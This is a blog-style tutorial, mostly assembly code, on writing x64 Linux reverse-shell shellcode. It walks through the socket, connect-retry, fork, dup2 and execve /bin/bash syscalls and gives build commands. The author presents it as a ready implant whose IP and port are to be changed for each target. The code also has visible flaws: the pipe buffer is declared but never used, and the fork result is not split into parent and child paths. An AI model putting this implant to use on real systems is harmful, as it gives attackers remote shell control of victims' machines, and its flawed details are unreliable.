How I developed x64 reverse shell shellcode

Today I was thinking about how many penetration testers rely on prebuilt implants to get a shell on the target machine. I often use meterpreter implants on Linux machines myself because it saves time, and most Linux machines don’t run an AV engine, so the implant is unlikely to be detected automatically.

All of this is good, but sometimes I feel I need to create my own arsenal. Using implants generated by open-source C2 frameworks feels script-kiddie. So, I decided to write my own shellcode for getting reverse shells on x64 Linux platforms.

x64 Linux system call table

Many people say that Linux is an amazing operating system. I disagree. Linux distros are amazing operating systems. Linux itself is just a kernel. Well, in order to achieve anything from a standard user-mode process, we need help from the kernel. For example, I can’t create a socket without the kernel, and I can’t allocate a buffer on the heap without the kernel. The kernel exposes these services as system calls. For example, if I want to output something in the console, I would do this:

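section .rodata
message db "Hello, World!", 10      ; 10 = newline; write needs no terminating 0
message_size equ $ - message        ; length in bytes, computed at assembly time

section .text
global _start

_start:
mov rax, 0x01                       ; syscall number: write
mov rdi, 0x01                       ; fd 1 = STDOUT
lea rsi, [message]                  ; pointer to the buffer
mov rdx, message_size               ; number of bytes to write
syscall

mov rax, 0x3C                       ; syscall number: exit
mov rdi, 0x00                       ; exit status 0
syscall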

This will output Hello, World! in the console.

Before I start, I would like to explain some basic concepts. First of all, every syscall has its own number, not only on Linux but on every OS. On Linux those numbers are easy to look up because the kernel is open source. BTW, everything is open source if you can read and understand Assembly, so it’s also possible to obtain syscall numbers from the ntdll.dll function stubs on Windows.

For example, when calling the NtCreateUserProcess function directly from ntdll.dll in order to avoid kernel32.dll and kernelbase.dll, it’s possible to read the stub and capture the system call number. That’s because every standard user process reaches the kernel through a chain of DLL files: kernel32.dll forwards to kernelbase.dll, and finally ntdll.dll performs the actual syscall. A system call is a request to the kernel to do something on behalf of the process, for example creating a socket or allocating a buffer inside the virtual memory of the running process.

So, back to the main topic. The system call number always goes into the RAX register. The arguments go into the following registers, and their order can’t be changed:

  1. rdi
  2. rsi
  3. rdx
  4. r10
  5. r8
  6. r9
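The same convention can be observed from C through glibc’s generic syscall() function, which on x86-64 places the number in RAX and the remaining arguments in the registers listed above. This is only a sketch: raw_write is a hypothetical helper name, not part of the shellcode.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <sys/syscall.h>   /* SYS_write */
#include <unistd.h>        /* syscall() */

/* Hypothetical helper: issues write(fd, buf, len) through the generic
 * syscall() entry point instead of the write() wrapper.
 * On x86-64: RAX = SYS_write, RDI = fd, RSI = buf, RDX = len. */
long raw_write(int fd, const void *buf, size_t len)
{
    return syscall(SYS_write, fd, buf, len);
}
```

Calling raw_write(1, "Hello, World!\n", 14) would do the same job as the first syscall in the Assembly example.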

Let’s start with a theoretical model of the shellcode: it tries to connect to an IP address on a specific port. If successful, it spawns a subprocess (child process) and runs /bin/bash in it. If not successful, execution stops. I’ll also add a switch that decides whether the shellcode tries to reconnect to the server or not.

I always use https://x64.syscall.sh/ because it’s impossible to remember every system call and its structure.

Writing the code

First of all, I need to implement sockaddr_in structure that’ll hold the information about the server (the device that the shellcode tries to connect to). I’m going to do it like this:

struc sockaddr_in
.sin_family resw 1
.sin_port resw 1
.sin_addr resd 1
.sin_zero resb 8
endstruc

Alright, so here is a structure that holds all the information that’s needed to make a connection. I’ll explain everything below. sin_family is the type of the address. In this case, I’m going to store AF_INET inside, which means IPv4 type. sin_port is just a port number. Note that the order of bytes differs between the host and the network. That’s why in C/C++ people do this:

server_addr.sin_port = htons(8080); // 8080 port number for example

htons() stands for Host TO Network Short. It converts 8080 from host byte order to network byte order (big-endian). After that comes sin_addr, which holds the IPv4 address of the target device (the attacker’s machine). sin_zero is just padding, and it’s not important in this case.
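To see what htons() actually does to the bytes, here is a small sketch. port_to_wire is a hypothetical helper that copies out the two bytes exactly as they sit in memory after the conversion.

```c
#include <arpa/inet.h>  /* htons() */
#include <stdint.h>
#include <string.h>     /* memcpy() */

/* Hypothetical helper: stores the port in network byte order and copies
 * the two bytes out in memory order. */
void port_to_wire(uint16_t port, unsigned char out[2])
{
    uint16_t be = htons(port);
    memcpy(out, &be, sizeof be);
}
```

For port 8080 (0x1F90) the two bytes come out as 0x1F followed by 0x90, regardless of the byte order of the host.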

After that, I’m going to create pipefds (PIPE file descriptors) inside uninitialized memory to connect the socket and the child process. That connection will redirect commands to /bin/bash and the output of /bin/bash to the socket. Without this, the attacker won’t be able to feed commands to /bin/bash and /bin/bash won’t be able to send the output to the attacker:

section .bss
pipefds:
resq 2

resq reserves quadwords (8 bytes each), so resq 2 reserves 16 bytes.

Now, it’s time to add read-only data section to write sockaddr_in object and other necessary variables (constants in this case):

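section .rodata
sockaddr istruc sockaddr_in
at sockaddr_in.sin_family, dw 2             ; AF_INET
at sockaddr_in.sin_port, dw 0x901F          ; port 8080, network byte order
at sockaddr_in.sin_addr, dd 0x0100007F      ; 127.0.0.1, network byte order
at sockaddr_in.sin_zero, dd 0, 0            ; 8 bytes of padding
iend
sockaddr_in_size equ $ - sockaddr

bash db "/bin/bash", 0
reconnect db 0                              ; 1 = keep retrying, 0 = give up after a failed connect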

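Alright, 8080 is 0x1F90, so it’s written as 0x901F here: x64 is little-endian, and the bytes end up in memory as 1F 90, which is network order. The same goes for 0x0100007F, which ends up as 7F 00 00 01, i.e. 127.0.0.1. sin_family gets 2 as a value, which means AF_INET.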
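For comparison, this is roughly how the same structure would be filled in from C. It’s a sketch under the assumption that the standard struct sockaddr_in from netinet/in.h is used; make_ipv4_addr is a hypothetical helper name.

```c
#include <arpa/inet.h>   /* htons(), inet_pton() */
#include <netinet/in.h>  /* struct sockaddr_in */
#include <string.h>      /* memset() */
#include <sys/socket.h>  /* AF_INET */

/* Hypothetical helper: fills addr for ip:port.
 * Returns 0 on success, -1 if ip is not a valid IPv4 string. */
int make_ipv4_addr(struct sockaddr_in *addr, const char *ip, unsigned short port)
{
    memset(addr, 0, sizeof *addr);      /* also clears sin_zero */
    addr->sin_family = AF_INET;
    addr->sin_port = htons(port);       /* network byte order */
    return inet_pton(AF_INET, ip, &addr->sin_addr) == 1 ? 0 : -1;
}
```

With "127.0.0.1" and 8080, the port bytes in memory are 1F 90 and the address bytes are 7F 00 00 01, which is what the hand-written constants in the .rodata section encode.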

After that, I’ll define .text section that holds actual instructions:

section .text
global _start

_start label is going to hold all of the code:

_start:
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx

mov rax, 0x29           ; syscall number: socket
mov rdi, 2              ; AF_INET
mov rsi, 1              ; SOCK_STREAM
mov rdx, 6              ; IPPROTO_TCP
syscall

As you can see, I started writing socket() function’s logic. RAX gets 0x29 which is the number of the system call that belongs to socket function in the kernel. It should get 3 parameters: AF_INET, SOCK_STREAM and IPPROTO_TCP. These tell the kernel that the connection should be over TCP/IPv4 protocols.

BTW, the return value of every system call goes into RAX. In this case, RAX holds the file descriptor of the newly created socket (or a negative error code if the call failed). After that, I’m going to store that fd (file descriptor) inside the RBX register because I need RAX for the next system call:

_start:
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx

mov rax, 0x29
mov rdi, 2
mov rsi, 1
mov rdx, 6
syscall

mov rbx, rax
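At the raw system call level there is no errno variable: on failure the kernel leaves a negative error code in RAX, in the range -4095 to -1, and anything else is a valid result such as a file descriptor. A minimal sketch of that check, with hypothetical helper names:

```c
/* Hypothetical helpers that interpret the raw value the kernel leaves in RAX. */

/* Returns 1 when ret falls in the kernel's error range [-4095, -1]. */
int raw_syscall_failed(long ret)
{
    return ret < 0 && ret >= -4095;
}

/* Returns the positive error code of a failed call, or 0 on success. */
int raw_syscall_errno(long ret)
{
    return raw_syscall_failed(ret) ? (int)-ret : 0;
}
```

The shellcode above skips this check after socket and simply keeps whatever RAX contains.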

Then, I’ll add _connect label for the loop. This loop will continue until the shellcode manages to connect to the target (if reconnect is enabled):

_start:
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx

mov rax, 0x29
mov rdi, 2
mov rsi, 1
mov rdx, 6
syscall

mov rbx, rax

_connect:
mov rax, 0x2A
mov rdi, rbx
lea rsi, [sockaddr]
mov rdx, sockaddr_in_size
syscall

Above, I call connect, which also takes 3 parameters. The first parameter is the fd of the socket that we already created, the second is a pointer to the sockaddr object created in the .rodata section, and the last is the size of that object. Note that I’m not using the mov instruction to load the object itself into the RSI register. That’s because connect expects the address of the structure, and the 16-byte structure wouldn’t fit into a 64-bit register anyway. So, I load the memory address of the object with the LEA (Load Effective Address) instruction, and the kernel reads the structure from there.

After this system call, I need to check if the connection was successful:

_start:
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx

mov rax, 0x29
mov rdi, 2
mov rsi, 1
mov rdx, 6
syscall

mov rbx, rax

_connect:
mov rax, 0x2A
mov rdi, rbx
lea rsi, [sockaddr]
mov rdx, sockaddr_in_size
syscall

test rax, rax                   ; 0 = connected, negative = error code
jz _connected
cmp byte [reconnect], 0         ; is the reconnect switch enabled?
jne _connect                    ; yes: try again
jmp _end                        ; no: close the socket and exit

_connected:

Here, I check the return value of connect. If it is 0, the connection was successful and execution continues at the _connected label. If the connection was unsuccessful and reconnect is enabled, the CPU jumps back to the _connect label, so execution continues from there. It’s a loop. If reconnect was disabled when the shellcode was assembled and the connection was unsuccessful, execution jumps to the _end label and stops.
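The decision described above can be written out as a small C function. This is a sketch of the intended behaviour only; the enum and the function name are hypothetical.

```c
/* Hypothetical names for the three possible outcomes after connect. */
enum next_step { STEP_CONTINUE, STEP_RETRY, STEP_EXIT };

/* ret is the raw return value of connect (0 on success, negative on failure),
 * reconnect is the switch stored in the read-only data section. */
enum next_step after_connect(long ret, int reconnect)
{
    if (ret == 0)
        return STEP_CONTINUE;               /* connected: go on to fork */
    return reconnect ? STEP_RETRY : STEP_EXIT;
}
```

Note that the outcome depends only on whether ret is zero, not on which error code came back.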

Now, I need to use fork() system call to spawn a child process, and then I must put /bin/bash inside with no parameters and environment. Before I put /bin/bash there, I must redirect STDIN, STDOUT and STDERR to the socket.

First of all, let’s do fork:

mov rax, 0x39           ; syscall number: fork
syscall

test rax, rax           ; a negative return value means fork failed
js _end

_end label is not yet defined, but it’s alright. 0x39 is the number of the system call that belongs to fork() and it does not need to have any parameters at all.
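For reference, fork returns twice: 0 in the child and the child’s PID in the parent. The sketch below shows that from C with the libc wrapper, which reports failure as -1 instead of a raw negative error code. fork_and_collect is a hypothetical helper name.

```c
#include <sys/types.h>
#include <sys/wait.h>   /* waitpid(), WIFEXITED, WEXITSTATUS */
#include <unistd.h>     /* fork(), _exit() */

/* Hypothetical helper: forks, lets the child exit with `code`,
 * and returns that code as seen by the parent (-1 on failure). */
int fork_and_collect(int code)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;              /* fork failed, no child was created */
    if (pid == 0)
        _exit(code);            /* child: fork() returned 0 */

    int status = 0;             /* parent: fork() returned the child's PID */
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```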

After that, I must call dup2 three times. This system call duplicates one file descriptor onto another, so the standard input, output, and error streams are going to be connected to the socket:

mov rax, 0x21
mov rdi, rbx
mov rsi, 0
syscall

mov rax, 0x21
mov rdi, rbx
mov rsi, 1
syscall

mov rax, 0x21
mov rdi, rbx
mov rsi, 2
syscall

Note that RBX stores the socket fd, and 0, 1 and 2 are the standard streams: STDIN, STDOUT and STDERR.
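The effect of dup2 is easy to try out in C. In the sketch below, redirect_onto is a hypothetical helper that points every descriptor in a list at the same open file as src.

```c
#include <unistd.h>      /* dup2() */

/* Hypothetical helper: makes each descriptor in targets[] refer to the same
 * open file as src. Returns 0 on success, -1 if any dup2() call fails. */
int redirect_onto(int src, const int *targets, int count)
{
    for (int i = 0; i < count; i++) {
        if (dup2(src, targets[i]) < 0)
            return -1;
    }
    return 0;
}
```

For the shellcode’s case, src would be the socket fd and targets would be 0, 1 and 2.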

Now, the child process’s standard streams are connected to the socket fd. That means the attacker can send data to the child process (it holds /bin/bash) and receive output/errors accordingly. The only thing that’s left is to add the execve system call. This system call does the actual execution:

mov rax, 0x3B           ; syscall number: execve
lea rdi, [bash]         ; path of the program to run
xor rsi, rsi            ; argv = NULL
xor rdx, rdx            ; envp = NULL
syscall
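The shellcode passes NULL for both argv and envp. Linux accepts that, but it is non-portable, so the C sketch below passes a conventional argv and an empty environment instead. run_program is a hypothetical helper name; it runs the program in a child so that the caller survives the execve.

```c
#include <sys/types.h>
#include <sys/wait.h>   /* waitpid(), WIFEXITED, WEXITSTATUS */
#include <unistd.h>     /* fork(), execve(), _exit() */

/* Hypothetical helper: runs path with argv in a child process and
 * returns the child's exit code (-1 if fork or waitpid fails). */
int run_program(const char *path, char *const argv[])
{
    char *const envp[] = { NULL };      /* empty environment */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, envp);       /* only returns on failure */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

On success execve never returns, because the process image is replaced by the new program. That’s why nothing after it runs in the child unless the call fails.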

Finally, I must add the _end label to complete the shellcode. It holds the logic for closing the socket fd and exiting the program:

_end:
mov rax, 0x03           ; syscall number: close
mov rdi, rbx            ; the socket fd
syscall

mov rax, 0x3C           ; syscall number: exit
mov rdi, 0x00           ; exit status 0
syscall

Assembling the shellcode to get .elf file

Everything is done. I just have to do a “compilation” process. First of all, I’m going to use nasm assembler to create .o file (object file that needs to be linked), and then I’m going to use ld to link the object file and get the final result (.elf file):

nasm -f elf64 shellcode.asm -o shellcode.o
ld shellcode.o -o shellcode.elf

Of course, sin_addr, sin_port and reconnect should be changed to match the scenario. Right now, this code just tries to connect to localhost:8080, and if it fails, it just stops the execution.

The full source code is available on my GitHub.